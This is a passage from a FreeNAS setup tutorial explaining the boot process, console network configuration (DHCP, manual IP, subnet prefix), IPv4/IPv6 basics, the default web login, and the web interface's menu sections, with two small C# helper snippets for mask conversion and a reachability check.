often see being counted on the screen) and which devices are connected (like hard drives and CDROMs). It should then start to boot from the CD. Here, FreeBSD (the underlying OS of FreeNAS) will start to boot, this is recognizable by the simple spinning wheel (made up of simple text characters like | - / and which are animated to give the appearance of spinning). The third step is the FreeNAS boot menu. This will appear for just five seconds and you should just let it boot normally which is the default. The final stage is when the FreeNAS logo appears and the system will boot as a FreeNAS server. You can tell when the system is fully loaded because the PC speaker will make some short but melodious beeps. Configuring the Network The majority of the configuration for FreeNAS is done via a web interface, but before you can use the web interface, the FreeNAS server needs to be configured for your network. 
This is done via a simple text menu system using the keyboard and monitor attached to the PC with FreeNAS running on it. You probably only need to do this once, and after that this new network information will be saved on the USB flash disk (or floppy disk) and the server will boot into this configuration every time. If you press the SPACE bar on FreeNAS machine, the FreeNAS logo will disappear and a simple menu will appear.     Here, you have a number of options including options to reboot or power off the system. The first two options are about configuring the network and they reflect the two parts to configuring the network, first you need to choose which network card to use (option 1) and second you need to assign it an address (option 2). If you have only one network card in your machine then the FreeNAS server should have found it and automatically assigned it to be the LAN (Local Area Network) interface. What If My Network Card Isn't Found?This probably means that the network card in your machine isn't supported by FreeNAS or more specifically by FreeBSD. You will need to replace the card with one supported by FreeBSD. Check the FreeBSD hardware compatibility page for more information: http://www.freebsd.org/releases/6.2R/hardware-i386.html If you see something like the following screenshot:     then the network has been recognised and assigned automatically by FreeNAS. What is a LAN IP Address? IP stands for Internet Protocol and it is the basic low level language that computers use to talk to each other on the Internet. It is also used on private networks (in the office or at home) to connect different PCs and even printers to each other. An IPv4 address is made up of 4 sets of number (0 to 255) and is expressed in what is known as dot notation (meaning that each number has a dot between it). So 192.168.1.250 is an IP address, it also happens to be the default IP address for the FreeNAS server. Like email, the postal service and telephone, each destination (email account, mailbox or handset) needs a unique way of being identified. This is what IP addresses do; they allow each piece of equipment on the network to have a unique identifier so that messages can be addressed to the right place on the network. Pronouncing IP AddressesIf you need to speak to someone about an IP address, the simplest way is to speak about each digit separately, so 192.168.1.250 isn't "one hundred and ninety two dot" but rather "one nine two dot one six eight dot one dot two five zero". There are two ways in which you can obtain an IP address for the FreeNAS server. The first is to have the address assigned automatically via the DHCP service (Dynamic Host Configuration Protocol), and the second is to assign it manually. What is DHCP?The Dynamic Host Configuration Protocol (DHCP) automates the assignment of IP addresses and other IP parameters (like subnet masks and default gateway). A computer that needs an IP address will send a request to the DHCP server and the server will reply with an IP address from a pool of addresses that have been set aside for this purpose. A DHCP server can be a PC or server (running Windows, OS X or Linux) as well as small devices like modern DSL modems and firewalls. The advantage of the DHCP method is that the IP address assignment, all happens in the background and you don't need to worry about setting it yourself. 
The disadvantages are that first you need to have an already configured and running DHCP server on your network; and second, DHCP assigns addresses from a pool of available addresses. This means that every time the FreeNAS server boots, it is not guaranteed to have the same address as it had previously. This isn't a problem when using the CIFS protocol, however, for accessing the web interface or using protocols like FTP, it is desirable to have a stable IP address to refer to. However, for testing the FreeNAS server and learning about how it works using a DHCP assigned address could be acceptable for now. It is actually possible to assign fixed, permanent IP address to certain pieces of hardware, including a FreeNAS server over DHCP, but that requires extra advanced configuration changes in the DHCP server that cannot be covered in this tutorial. So opting for the manual IP address, you now need to obtain two pieces of information. The first is the actual IP address for the FreeNAS and the second is what is known as the subnet mask. The subnet mask will also be expressed in the dot notation and is normally something like 255.255.255.0. If you are in an office environment, you need to speak to the network administrator and he/she will be able to give you the information you need. If you are administering your own network, you need to choose an IP that isn't currently allocated to any other machine on your network (and also, isn't part of the address pool of any DHCP server on your network). Having obtained the IP address and subnet mask, you can now configure the FreeNAS server for your network. Select option 2 on the console menu. If you have chosen to have DHCP assign the address, answer yes (y) to the first question about using DHCP for IPv4. Otherwise answer no (n). If you are setting the address manually, you can now enter the address in dot notation, i.e. 192.168.1.240. Next, comes the subnet mask. If your subnet mask is 255.255.255.0: enter 24, for 255.255.0.0: enter 16, and for 255.0.0.0: enter 8. At this point, you can now skip the default gateway and DNS questions (by just pressing ENTER). We won't be using IPv6 so the simplest thing to do now is just answer yes to the "Do you want to use AutoConfiguration for IPv6?" question. This will cause a small delay while FreeNAS tries (and probably fails) to get the IPv6 address but it is simpler than trying to enter the IPv6 address manually! After you have successful set the IP address, there will be a small message on the screen inviting you to access the web interface by opening the listed URL in your web browser. If you have used DHCP, note down the URL listed. If you set the IP address manually, check that the URL listed is the same as the IP address you set with [http:// http://] in front of it. You are now ready to access the web interface. What is IPv4 and IPv6?The Internet Protocol has been around since the mid 1980's and when it was designed, the popularity of the Internet was not envisaged. The number of computers connected to the Internet is quickly growing beyond the addressing capabilities of the original protocol. As an answer to this, a new version of the IP protocol has been designed and has been given the name IP version 6 or IPv6 for short and the older version has taken the name IP version 4 or IPv4 for short. FreeNAS supports both versions of the Internet Protocol. In this tutorial, we will concentrate just on IPv4 as it still remains the most popular of the two protocols. 
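As the steps above mention, FreeNAS expects the subnet mask as a prefix length (24 for 255.255.255.0, 16 for 255.255.0.0, 8 for 255.0.0.0). The prefix length is simply the number of 1 bits in the mask, so a less common mask can be converted with a quick calculation like the one below. This small C# sketch is purely illustrative and is not part of FreeNAS.

using System;
using System.Linq;

class MaskToPrefix
{
    // Converts a dotted subnet mask (e.g. 255.255.255.0) to a prefix length (e.g. 24)
    // by counting the 1 bits in each octet of the mask.
    static int PrefixLength(string mask)
    {
        return mask.Split('.')
                   .Select(byte.Parse)
                   .Sum(octet => Convert.ToString(octet, 2).Count(bit => bit == '1'));
    }

    static void Main()
    {
        Console.WriteLine(PrefixLength("255.255.255.0")); // 24
        Console.WriteLine(PrefixLength("255.255.0.0"));   // 16
        Console.WriteLine(PrefixLength("255.0.0.0"));     // 8
    }
}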
Basic Configuration With your FreeNAS server now being up and running, it is time to access the web interface. Open a web browser on a computer on the same network as the FreeNAS server. Enter in the URL of the FreeNAS server. This should be the same as the IP address of the server with [http:// http://] in the front. The default URL is http://192.168.1.250     The first time you access the FreeNAS web interface, you will be asked for the username and password. The default username is admin and the default password is freenas. FreeNAS Web Interface You should now have the web interface in your browser. The interface is split into two main sections. Down the left-hand-side are the menus, and the right-hand-side contains the pages for configuration. The menus are split into various sections: System, Interfaces, Disks, Services, Access, Status, Diagnostics, and Advanced.     When talking about a particular menu item, we shall use the notation Subsection: Menu Item to help you find the right menu option easily. So, the Management option, which is in the Disks subsection, will be referred to as Disks: Management. System This section is for system level configuration and operations, here for example you can change the username and password, backup and restore the configuration data, and shutdown or reboot the server. Interfaces Here, you can configure the network of the FreeNAS server much like you did via the console menu. You can change the network card that is used for the web interface and assign permanent or automatic IP addresses. Be careful when you change things here as some changes won't take effect until you reboot. If you have changed any of the addressing, you will need to access the web interface with the IP address. Disks This section of the menu is for administering the disks on the server. Here, you can set up disk redundancy (RAID), control encryption, format disks, and mount the disks on the server. Services The various access protocols like CIFS, NFS, and FTP are controlled from here. Each service is administered individually and by default NONE of the services are enabled, so before you can access files stored on the FreeNAS server, you need to enable at least one of these services. Access Most of the services offered by FreeNAS use some form of list of users to control who has access and who does not. This section is for defining these users and the groups they belong to as well as connecting the FreeNAS server to other directory services. Status The status menu has several reporting tools for you to see the current state of your FreeNAS server including a general overview, memory usage, disk usage, and network usage. You can also configure emails to be sent periodically about the status of the server. Diagnostics The diagnostics menu contains different tools to help diagnose any problem with the FreeNAS server, including logs of all the important services and diagnostic information from the hard disks and other system modules. Advanced The advanced section provides some simple tools for executing commands at the operating system level and should not be used by those unfamiliar with FreeBSD.    
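If you want a quick scripted check, from any machine on the network, that the web interface is answering before you open a browser, something like the following sketch can be used. It is illustrative only and not part of FreeNAS: it uses the default URL and the admin/freenas credentials mentioned above, and it sends them as HTTP Basic authentication, which may or may not match how your FreeNAS version prompts for login; even without valid credentials, any HTTP response tells you the server is reachable.

using System;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;
using System.Threading.Tasks;

class FreeNasCheck
{
    static async Task Main()
    {
        // Default FreeNAS web interface address and credentials, as described in the text.
        string url = "http://192.168.1.250/";
        string token = Convert.ToBase64String(Encoding.ASCII.GetBytes("admin:freenas"));

        using (var client = new HttpClient())
        {
            // Assumption: the web GUI accepts HTTP Basic authentication.
            client.DefaultRequestHeaders.Authorization =
                new AuthenticationHeaderValue("Basic", token);

            try
            {
                HttpResponseMessage response = await client.GetAsync(url);
                Console.WriteLine("Web interface responded with status: " + (int)response.StatusCode);
            }
            catch (HttpRequestException ex)
            {
                Console.WriteLine("Could not reach the web interface: " + ex.Message);
            }
        }
    }
}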